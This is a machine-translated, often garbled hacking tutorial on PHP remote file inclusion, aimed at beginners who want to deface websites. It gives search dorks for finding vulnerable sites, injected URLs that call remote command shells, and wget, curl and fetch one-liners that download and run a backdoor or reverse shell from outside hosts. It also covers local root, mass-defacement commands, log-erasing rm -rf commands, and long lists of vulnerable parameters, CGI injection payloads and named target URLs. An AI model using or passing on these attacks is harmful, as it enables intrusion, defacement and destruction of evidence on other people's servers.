Tutorial complete of php injection for BEGINNING


Tutorial developed for the naughty one


1) Introduction

Since a lot people asks help about php injection, 
I resolved to do a tutorial of simple understanding for the facilitate the life of the galley new.  
This fails consists of users will include scripts in the codigo php of the claims 
as a victim and this to be performed. When correctly it utilized, 
that is what I will explain in this tutorial one, the intruder is able to sets commands to the server.  
Good part of the trial can be deed by the own one browser (IE, mozilla, netscape. ..).  
I will try to explain as it looks, explores and corrects the bug.  
I am going to be used for everybody;)

Obs1.: This tutorial one was made to explain one in the ways used for people 
to disfigure sites but it can be utilized for other ends. 
Vai of the head of each one: P

Obs2.: In the end, they will have urls with the sited programs.



2) What it is what

Vitima: Site that you will go to explore the imperfection of php.
String: Archives in the site suceptiveis to the attack.
Cmd: Script in PHP that in makes possible them to type 
commands to be includes in php.
Backdoor: It opens doors in the system for remote connection 'without 
verification'.
Connect Back: It opens a door specifies for connections between its 
PC and target.
Exploit: Program that explores certain imperfection in a system. 
It has some types of Exploits. Here, we will go 
to deal only with Place Root Exploits. (they explore 
imperfections local that they take common users 
access root - super-user -)
Shell: It is an interpretative program of commands that 
it allows the user to iteragir with the system 
operational through typed commands.
Telnet: We will use for remote connections.
Firewall: It is an intelligent barrier between a local net
e the Internet, through which it only passes traffic 
authorized. This traffic is examined by 
firewall in real time and the election is made of 
agreement with the rule. “what it was not express
allowed, it is forbidden "
root: Super-user. He is admin… has total access to
system.



------------------- In browser


3) Strings

There are several strings available. In this tutorial one, 
I will go to use for examples one simple good that is “index.php? page=”. 
In annex, the end, several others: P



4) Syntax

Former:
www.site.com /index.php?page= http://CMD/cmd.gif?&cmd= ls

^ ^ ^ ^
Target String CmD command unix

P.S.: Without the spaces. 



5) Looking vulnerable site.

An excellent one ferramente for kiddies, without a doubt, is google. 
There are several ways to make search for it, among them:

Obs.: The word “word” q I will go to site here is any thing that you it is looking in the search engine.

word: Search for sites q contains “word” in any 
place of the page.
allinurl: : Sites that contains in the URL word sited. Former: 
www.site.com/forum/word.php?id=0.
allintitle: : It restricts its research to the heading of the page. 
intitle: : Seemed with from above one, for greaters 
clarifications in the end of tutor.
inanchor: : Search in links inside co body of the sites. <a 
href= " SEARCH HERE INSIDE " >
site: : Search sites of one determined domain. Ex: 
site: br < - searching sites with .br
link: : Sites that contains links for one another one 
determined site. Former: link: www.securityfocus.com
filetype: : It filters for extensions of archives. Former: 
filetype: php < - searching url with .php 

These tips must not only be used in the search of sites 
vulneraveis, but also in the common searches for you ;)

Using string “index.php? page=” for sites .gov -->
allinurl: index.php? page= site: gov

Easy.
.
You also can use to scanner pra to become the process more 
efficient. to kieger (member of it r00t_System grouP) codou one in Perl: 
Search with the system of google, forehead and prints the vulneraveis in one 
archive. Code in the end of the tutorial one.



6) Using the CmD

6.1) Including

Cmd = http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id


In the result, it inserts cmd in string. Former:
www.site.com/index.php?page=http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id

It does not have mystery.

6.2) The Cmd

datacha0s - PHP Command/Safemode Exploit
System Information

sysname: --> Operational system twirling.
nodename: --> local Name.
release: --> Version of kernel.
Script Current User: --> Using for which script is being executed.
PHP Version: --> Version of php of the machine
User Info: --> Information of user (uid, euid, gid).
Current Path: --> current Folder that you are in the server.
Server IP: --> IP of the server.
Web server: --> Information on the server.


[*] Command Mode Run
Command Stdout

((here ficarao the results of the commands))
((inserted in cmd)) 


Obs.: Script varies of cmd cmd. This is only one example. 


7) Gaining access to shell


For the next steps, you it needs to be in shell 
(interpretative of commands) of the machine. For this, I will explain two 
ways to become this possible one: Backdoor and Connect Back. 

7.1) Rolling backdoor in the server for remote connection

To a backdoor roll, it is enough to make one upload, to choose 
permissions, and to execute it. 

Command: cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backd
oor;chmod 777 backdoor;./backdoor

cd /var/tmp - > Faz the operation in this folder, for being common 
all the users and had to its permissions. 
/tmp tb serves:)

wget www. (...) /backdoor - > Copy the backdoor from a URL for 
site. When wget not to function, tries others 
commands. Syntaxes:

wget www.site.com/file
lynx -source www.site.com/file> archive
curl -o www.site.com/file
GET www.site.com/file> archive
(...)


wget
it types --->
cd /tmp;wget http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin


when the Shell soh accepted GET -
it types ---> 
cd /tmp;GET http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin

when to accept lynx - source 
it types --->
cd /tmp;lynx -source http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin

When to accept curl -o
it types 
cd /tmp;curl -o bird http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin

e when the Kernel of the Shell will be
FreeBSD 

vc it types --->

cd /tmp;fetch http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin



After made this, it will appear the following message:

	     ,--.     |    o      
	,-.-.|  |,---.|--- ..  ,  
	| | ||  ||    |    | ><   
	` ' '`--'`    `---'`'  `  

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 14274
Shell on: 9997      User: wwwrun        UID: 30
Name: /sbin/syslogd  (Masked in PS! )  v: = Linux s106 2.6.5-7.151-default


Rootab !! use: expand_stack, Krad(if 2004) !
	     ,--.     |    o      
	,-.-.|  |,---.|--- ..  ,  
	| | ||  ||    |    | ><   
	` ' '`--'`    `---'`'  `  

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 14274
Shell on: 9997      User: wwwrun        UID: 30
Name: /sbin/syslogd  (Masked in PS! )  v: = Linux s106 2.6.5-7.151-default


Rootab !! use: expand_stack, Krad(if 2004) !


PORT = 9997

This means that the backdoor is rolling. 
Now, it is enough to connect itself shell. How?

In the Win: To initiate - > Perform - > telnet www.site.com port

Where www.site.com receives name or IP from the site that you rolled 
backdoor and port are the port that the backdoor is working.

If to appear in the telnet bash-2.05b$ or something seemed, is because 
it functioned! And you have access to shell in the machine!
If to delay a time and not to fall in shell, confer the name/ip of the
server. if he will be correct, it is rolling Firewall. And now? 
simple, Connect Back. : P



7.2) Connect Back 


Very efficient method to gain shell in a machine. It gains shell 
reversamente.
Windows: It lowers netcat for windows and in the Prompt of the MSDOS (in 
folder that nc if finds), types: nc - vv - l - p 15, where 15 
its preference can in accordance with be chosen. This door will be the one that 
it will carry through the connection.

Now, coming back to browser it, in cmd it types the following command:
cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP port

cd /var/tmp - > Exactly that for backdoor.
wget www.site.do.dc.com/dc - > | | | | , but is logic, with 
address of dc.
./dc IP port - > where IP is ITS IP and port is the door 
that you chose in netcat.


Made this, if to occur all certainty, it will appear as resulted:

Connect Back Backdoor

[*] Dumping Arguments
[*] Resolving Host Name
[*] Connecting…
[*] Spawning Shell
[*] Detached

This signifies that you was connected in the shell!  ;) Now, it goes for 
MSDOS and we go for the next step.

If to appear

Connect Back Backdoor

[*] Dumping Arguments
[*] Resolving Host Name
[*] Connecting…
[-] Unable you the Connect

it confers the data (its IP, carries, netcat, etc). If to insist, its 
not accepted net this type of connection. It tries other doors (as 80, 22, 
15, etc).



---------------------------------- In the Shellll 


8) Basic commands

I went to pass direct in this part, but I know that many do not know 
the commands unix. Then we go to know some:

ls - > List archives. It can be combined with -a (shows 
occult) and - l (it shows at great length). Former: ls - la 
(it shows the archives, also occult at great length).
uname - - > Mostra information of the system, as version of kernel, uteis name, and other things. 
id - > Mostra its id.
w - > List the users logados at the moment.
cp - > Copia archives. Syntax: cp /destino/ archive
mv - > Move archives. Sintexe: mv /destino/ archive
rm - > Remove archives. If combined with - rf, removes all 
the setados archives, also folders
mkdir - > Create diretory
rmdir - > Delete diretory
find - > Seeks for archives/folders. Ex: “ find /etc - name 
httpd.conf “ looks for for httpd.conf in the /etc folder
pwd - > Sampled where folder you are located
cat - > Exhibits the content of an archive in the screen

head - > Exhibits lines of the beginning of the archive
tail - > Exhibits final of the archive
ctrl+c - > Leave/kill a programs
ctrl+r - > Seeks command typed in history of bash
ps - auxw - > List all the processes of the system
netstat - in - > Status of the connection
kill -9 - > Deleting process. Syntax: kill -9 PID OF the PROCESS
kill -HUP - > Restarting  process. Syntax: kill - HUP ID OF the PROCESS
pico - > Text editor.  Syntax: pico archives
vi - > | | vi archive


Saving resulted in files
command> /file/where/will be/stored
Ex: ls /etc > /tmp/s.txt safe all the result of the listing of 
/etc in the /tmp/s.txt files

Adding lines in archives
echo “line” >> /file/where/it will be/included

Unpacking archives (most common)
.tar - > to tar xvf files.tar
.tar.gz - > to tar zxvf files.tar.gz
.tar .bz2 - > to tar jxvf files.tar.bz2
.zip - > unzip files.zip


Compactando archives (most common)
.tar - > to tar cvf destination .tar ARCHIVE
.tar.gz - > to tar cvf destination .tar ARCHIVE | gzip destination .tar
.tar .bz2 - > to tar cvf destination .tar ARCHIVE | bzip2 destination .tar
.zip - > zip destination .zip ARCHIVE


Good. it looks a tutorial one of linux for bigger clarifications: P 



9) Gaining access root 

To gain access local root in a machine, goes to depend 
much. You need one exploit local and the system must be vulnerable.
Simple, it is enough to lower, to choose the permissions and to execute. thus 
as you it makes with the backdoor. but this you makes in shell.
Most common at the moment they are mremap, brk and kmod for kernel 
below of 2.4.24
If everything to occur correctly rootando the machine, when typing 
command “id” you will see

bash-2.05b# id
uid=0 (root) gid=0 (root)



Soon! You are root! It is had fun;) 




-------------------------------- Corriginddoo bug 


10) Correction

Well simple way to correct bug of php is editing the archive 
php.ini in the folder of configuration of its apache and incapacitating the functions

system, exec, passthru, shell_exec

(...)
E, clearly, always to be intent with new features of security and 
to remain itself brought up to date :)))




-------------------------------- Fun for kkiiddies


Good, after to have root in the machine, it can be made what to want: P Vai 
of the creativity and necessity of the person. 

For kiddies, with the objective of pinchar the sites, we go there 
to understand as this functions. Better, I go to try to explain as mass makes one defacement.



11) List of the sites housed in the server

Good, for defacement, this part is essential: to know which the sites 
that they are there. But as?

11.1) httpd.conf

Generally the data of the housed sites are in this archive. It stops 
to make a listing of the sites, is enough to type a command that will go to read 
the archive httpd.conf and to print the lines that contain ServerName
(name of the sites). (in the folder where httpd.conf if finds)
cat httpd.conf | grep ServerName
(they will be in this same archive, you can save the result 
in archive - preferential in the folder of the site that you left - and to make download)
cat /etc/httpd/conf/httpd.conf | grep ServerName
---->
How? Good, in the CMD, type pwd. You it will see the place where you 
if it finds in the server. Ex: /home/httpd/vhosts/nasa.gov/web/
Let us say that the URL is this: http://nasa.gov/index.php?page=CMD
Then, if you to play the result for /home/httpd/vhosts/nasa.gov/web 
This archive will be in the root of the site. To only type this command:

cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/web/RESULT.txt
(only one example)
Made this, http://nasa.gov/RESULTADO.txt and to lower the list: P

<----

Now, where it is this? GENERALLY in the /etc/httpd/conf folders or 
/etc/apache/conf but varies very and can be found in others 
places. An efficient way, to put delayed, 
to find is making a complete search for system. Command:
find / -name httpd.conf
This prints where he is httpd.conf in the server. It can appear 
more than a result, it goes testing :P Only thus


11.2) Other ways…

If exactly thus, not to obtain to find which sites has there, looks for 
alternative forms. Unhappyly it does not have as to explain therefore in each server 
it has a way. Example:

If in the folder where the sites are located, they turned out ja will have the name 
and domain of them: Ex: ls /home/httpd/vhosts 
site.com
mtv.com .br
nasa.gov
whitehouse.gov
fuckbush.org
… etc

Other times, if find in a called archive 
confixxx_alguma_coisa… does not have magician. It searches the server… 


12) Making the  mass defacement

Good, first, it creates one index that you it wants that is in the place 
of the others. Made it, plays for some place that you can make upload pro server.
She has gratuitous places that they can be used, as 100free.com. 
She creates an account and she plays index there. If it will want rename for the .zip 
and stayed without publicities, is able to also :P

Now, the end: to change to all the others for its. Simple, one is enough 
command for this:

find /folder/where/are/the/sites -name “index.*” -exec cp 
/where/is/its/index.html {} \;

To know where they are the sites, only pwd in cmd. Ex: 
/home/httpd/vhosts/nasa.gov/web
One notices that all the others are in /home/httpd/vhosts.

Equal backdoor makes upload. wget http://its-index.com/its.index
Let us say that you it made for the /tmp folder, then, the command would be 
like this:

find /home/httpd/vhosts -name “index.*” -exec cp /tmp/index.html 
{} \;


Now it is alone to aguradar a little that all the sites will be pinchados: P


Posts: www.Zone-H.org www.coredumped.org www.delta5.com.br


13) Erasing logs

Some useful commands to erase logs:

rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;




-------------------------------- The End 
Soon, I find that this is alone. Any error, only say for that 
I can correct :D


Greetz pra tds of the IRC 

irc.undernet.org -j #Shellfull
irc.fullnetwork.org -j #Owned
irc.Gigachat.net -j #Owned


-------------------------------- Strings common 

####################################################
Cmd's:
___________________________________________________
http://www.agatsuma.kit.net/blabla/vsf.vsf?&list=1&cmd=id
####################################################
.tar -> tar xvf arquivo.tar
find / -perm 777 -type d

login: 'or''='
pass: 'or''='
 
___________________________________________________
/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?module=PostWrap&page=
/oneadmin/config.php?path[docroot]=
/b2-tools/gm-2-b2.php?b2inc=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir= 
/includes/header.php?systempath=
/maillist/admin.php
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir= 
/dotproject/modules/projects/view.php?root_dir= 
/dotproject/modules/projects/vw_files.php?root_dir= 
/dotproject/modules/tasks/addedit.php?root_dir= 
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/shoutbox/expanded.php?conf=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/db.php?path_local=
index.php?site=
index.php?url=
index.php?p=
index.php?openfile=
index.php?file=
index.php?go=
index.php?seite=
index.php?content=
index.php?side=
index.php?kobr=
index.php?pg=
index.php?doc=
index.php?l=
index.php?a=
index.php?pagina=
index.php?principal=
index.php?show=
index.php?opcao=
index.php?conteudo=
index.php?meio=
index.php?inc=
index.php?c=
index.php?rage=
index.php?arquivo=
principal.php?conteudo=
principal.php?arquivo=
principal.php?pagina=
principal.php?pg=
main.php?site=
template.php?pagina=
contenido.php?sec=
index_principal.php?pagina=
template.php?name=
forum.php?act=
home.php?action=
home.php?pagina=
noticias.php?arq=
main.php?x=
main.php?page=
default.php?page=
index.php?cont=
index.php?configFile=
index.php?meio.php=
index.php?include=
index.php?x=
index.php?open=
index.php?visualizar=
index.php?page=
index.php?pag=
index.php?cat=
index.php?action=
index.php?do=
index2.php?x=
index2.php?content=
main.php?pagina=
index.phpmain.php?x=
index.php?link=
index.php?canal=
index.php?screen=
index.php?langc=
services.php?page=
htmltonuke.php?filnavn=
/inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page=
/phpshop/index.php?base_dir= 
/admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix=
/contacts.php?cal_dir=
/convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
/header.php?admin_root=
/eventcal2.php?path_simpnews=
/eventscroller.php?path_simpnews=
/gbpro/top.php?header=
/fusion/templates/headline_temp.php?nst_inc=
/expanded.php?conf=
/include/main.php?config[search_disp]=true&include_dir=
/yabbse/Sources/Packages.php?sourcedir=
/bbs/include/write.php?dir=
/zpanel/zpanel.php?page=
/votebox.php?VoteBoxPath=
/admin_styles.php?phpbb_root_path=
/getpage.php?page=/getpage.php?page=
/lib/static/header.php?set_menu=
/calendar/calendar.php?serverPath=
/calendar/functions/popup.php?serverPath=
/calendar/events/header.inc.php?serverPath=
/calendar/events/datePicker.php?serverPath=
/calendar/setup/setupSQL.php?serverPath=
/calendar/setup/header.inc.php?serverPath=
/calogic/cl_minical.php?CLPATH=
/calogic/clmcpreload.php?CLPATH=
/calogic/mcconfig.php?CLPATH=
/calogic/mcpi-demo.php?CLPATH=
/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
/src/index_overview.inc.php?config[path_src_include]=
/src/image-gd.class.php?config[path_src_include]=
/src/image.class.php?config[path_src_include]=
/src/album.class.php?config[path_src_include]=
/src/show_random.inc.php?config[path_src_include]=
/src/main.inc.php?config[path_src_include]=
/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=
/xcomic/initialize.php?xcomicRootPath=
/xcomic/Xcomic.php?xcomicRootPath=
/xcomic/admin/admininitialize.php?xcomicRootPath=
/[path_to_squito]/photolist.inc.php?photoroot=
/[path-to-spid]/lang/lang.php?lang_path=
/inc/functions.inc.php?config[ppa_root_path]=
/phpSecurePages/secure.php?&cfgProgDir=
/ops/gals.php?news_file=
/gb/form.inc.php3?lang=
/nabopoll/survey.inc.php?path=
/ovidentia/index.php?babInstallPath=
/user_check.php?sitepath=
/last_gallery.php?YAPIG_PATH=
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/download/downloads.php?release_id=650&incdir=
/popper/childwindow.inc. php?form=
/clmcpreload.php?CLPATH=
/modernbill/samples/news.php?DIR=
/xtcommerce/admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
/twiki/bin/view/Main/TWikiUsers?rev=2%20|id%00
/index.php?m=1&pag=
/PHPBlog/images/cmd.php?cmd=
/_vti_bin/shtml.exe?_vti_rpc
/_vti_bin/_vti_aut/author.dll
Admin.dll, Author.dll, e Shtml.dll
####################################################
4nalbum: allinurl:modules.php?name=4nAlbum
/modules/4nAlbum/public/displayCategory.php?basepath=

Yabbse: allinurl:/yabbse/
/yabbse/Sources/Packages.php?sourcedir=

WEBinsta Mailing Manager V1.3 allinurl:/mailling/maillist/
/inc/initdb.php?absolute_path=

My_eGallery: allinurl:modules.php?name=My_eGallery
/modules/My_eGallery/public/displayCategory.php?basepath=

Zeroboard: allinurl:/zboard/zboard.php
/include/write.php?dir=

fusion: allintitle:fusion:news:management:system
/templates/headline_temp.php?nst_inc=

osticket: allinurl:/osticket/
/include/main.php?config[search_disp]=true&include_dir=

coppermine: allinurl:modules.php?name=coppermine
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=

becommunity: allinurl:/becommunity/index.php
/becommunity/community/index.php?pageurl=
/becommunity/index.php?pageurl=

intitle:PHPOpenChat ext:php
http://www.site.com/phpopenchat/contrib/yabbse/poc.php?poc_root_path=http://attacker
http://www.site.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://attacker

As to look for: ( allintitle:iPhotoAlbum - Your Online Photo Album )
http://new.ro.com.ua/photoalb/lib/static/header.php?set_menu=http://attacker

As to look for: ( "Squitosoft All Rights Reserved" )
http://cgi.easyinfo.at/bz/squito/photolist.inc.php?photoroot=cmd

As to look for: ( allinurl:**/screens/displayimage.php?pid=* ) ou ( allinurl:**/screens/thumbnails.php?album=* ) ou ( allinurl:**/ppa/screens/* )
http://www.ppa.baiz.org/ppa/inc/functions.inc.php?config[ppa_root_path]=cmd
http://www.helix.baiz.org/ppa/inc/functions.inc.php?config[ppa_root_path]=cmd

As to look for: ( allinurl:**/spid.php ) ou ( allinurl:**/spid.php?cat=*lang=* )
http://www.vvmvc.nl/spid/lang/lang.php?lang_path=cmd
http://www.archeogate.it/spid/lang/lang.php?lang_path=cmd
http://mail.llcew.edu.hk/~rayy/spid/lang/lang.php?lang_path=cmd

As to look for: ( "powered by siteframe" ) ou ( allinurl:*gob*/folder.php?id=* )
/classes.php?LOCAL_PATH=
http://www.ciudadano.gob.mx/coahuila/classes.php?LOCAL_PATH=http://secure.phila.gov/cse.gif?&cmd=id

allinurl:day.php?date=
/tools/send_reminders.php?includedir=
http://www.cmes.arizona.edu/calendar/tools/send_reminders.php?includedir=http://gigachat.net/tool.dat?&cmd=id

SEARCH WAY: "Powered by AutoLinks Pro"
al_initialize.php?alpath=http://www.foxcf.hpgvip.ig.com.br/cse.gif?&cmd=id

As to look for: ( "Powered by runcms" inurl:*.ru ) ou ( allinurl:*br*/newbb_plus/* ) ou ( allintitle:Lokal V 2 ) ou ( "Powered by E-Xoopport" ) ou ( Powered by ExV2 Vers. ) ou ( allinurl:*it*/newbb_plus/viewtopic.php?topic_id=*forum=* ) ou ( allinurl:*.it*/newbb/print.php?forum=*topic_id=* ) ou ( allinurl:*.br*/news/archive.php?op=*year=*month=* )
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=

Mambo
Como procurar: ( "Powered by Mambo" inurl:*gov* ) ou ( allinurl:*.br/index.php?option=com_content ) ou ( allinurl:*gov*/component/option,com_contact/Itemid,*/ )
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

PHPFanBase
Como procurar: ( "Powered by: PHPFanBase" inurl:*br* ) ou ( inurl:*.br/members.php?id=all ) ou ( "Powered by: PHPCalendar" ) ou ( "Powered by: PHPCurrently" ) ou ( "Powered by: PHPClique" ) ou ( "Powered by: PHPQuotes" ) 
protection.php?action=logout&siteurl=

AllMyGuests
Como procurar: ( Nuke ET Copyright © 2004 por Truzone. ) ou ( allinurl:*.edu.*/modules.php?name=allmyguests ) ou ( "powered by AllMyGuests" inurl:*br* )
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

Lite Mambo
Como procurar: ( "Site powered By Limbo CMS" )
index2.php?includes_dir=

Pivot
Como procurar: ( "powered by pivot" ) ou ( allinurl:*br*/entry.php?id=*#* ) ou( allinurl:*de*/*.php?c=*w=*t=* ) ou ( "powered by pivot" inurl:**/archive*.php ) ou ( "powered by pivot" inurl:**/entry.php?id=* )extensions/moblog/moblog_lib.php?basedir=
extensions/moblog/moblog_lib.php?basedir=

#### XMLRPC - BUGS #####

by phpmyfaq
powered by phpwebsite
powered by postnuke
includedby phpMyFAQ
powered+by+phpMyFAQ
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
phpAdsNew (adxmlrpc.php)
phpwebsite (rpc.php)
php-wiki (utils.php)
Wordpress (xmlrpc.php)
index.php?gadget= (blogxmlrpc.php)

####################################################
Cgi and archives pl that they allow to defacer, 
as awstats iconboard, etc.. 
Accumulated for unknown - unknown_br@linuxmail.org 
___________________________________________________
/cgi-bin/index.cgi?page=|uname%20-a;id|
/cgi-bin/awstats.pl?update=1&logfile=|id|
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;id;uptime;pwd;echo%20;echo%20|
/cgi-bin/ikonboard.cgi
/cgi-bin/acart/acart.pl?&page=|uname%20-a;pwd;id|
/cgi-bin/quikstore.cgi?category=|id| 
/cgi-bin/ubb/ubb.cgi?g=uname -a
/cgi-bin/hinsts.pl?|id;uname$IFS-a|                     
/cgi-bin/bp/bp-lib.pl?g=uname -a                   
/ccbill/whereami.cgi?g=ls
/cgi-bin/telnet.cgi                                   
/cgi-bin/1/cmd.cgi
/calendar.pl?command=login&fromTemplate=|uname%20-a;id;pwd| 
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a| 
/cgi-sys/guestbook.cgi?user=cpanel&template=|id| 
/events.cgi?t=|id| 
/powerup.cgi?a=latest&t=|id| 
/lc.cgi?a=|id| 
/news.cgi?a=114&t=|id| 
/biznews.cgi?a=33&t=|id| 
/jobs.cgi?a=9&t=|id| 
/articles.cgi?a=34&t=|id| 
/events.cgi?a=155&t=|id| 
/latinbitz.cgi?t=|id| 
/newsdesk.cgi?t=|id| 
/media.cgi?a=11&t=|id| 
/reporter.cgi?t=|id| 
/news.cgi?t=|id| 
/newsupdate.cgi?a=latest&t=|uname%20-a| 
/deportes.cgi?a=latest&t=|id| 
/news.cgi?a=latest&t=|uname%20-a| 
/biznews.cgi?a=33&t=|id| 
/whereami.cgi?g=id 
/auktion.pl?menue=|id|
/i-mall/i-mall.cgi?p=|id| 
/vote.pl?action=show&id=|id|
/shop.pl/page=|id|
/newsdesk.cgi?a=latest&t=|id|
/fileseek.cgi?head=&foot=|id|
/cgi-bin/probe.cgi?olddat=|id|
/emsgb/easymsgb.pl?print=|id|
/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname-a; id|
/csv_db/csv_db.cgi?fil e=file.extention|command|
/cgi-bin/jammail.pl?job=showoldmail&mail=|command|
/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001
/support_page.cgi?file_name=|command|
/cgi-bin/wwwnikki/wwwnikki.cgi?view=|uname%20-a;id;pwd|
http://[target]:3443/OvCgi/connectedNodes.ovpl?node=a|id|

===========================================================

translate by sintink with

google translate tools (http://translate.google.com)
Free Translation tools (http://www.freetranslation.com)

mail : sintink@gmail.com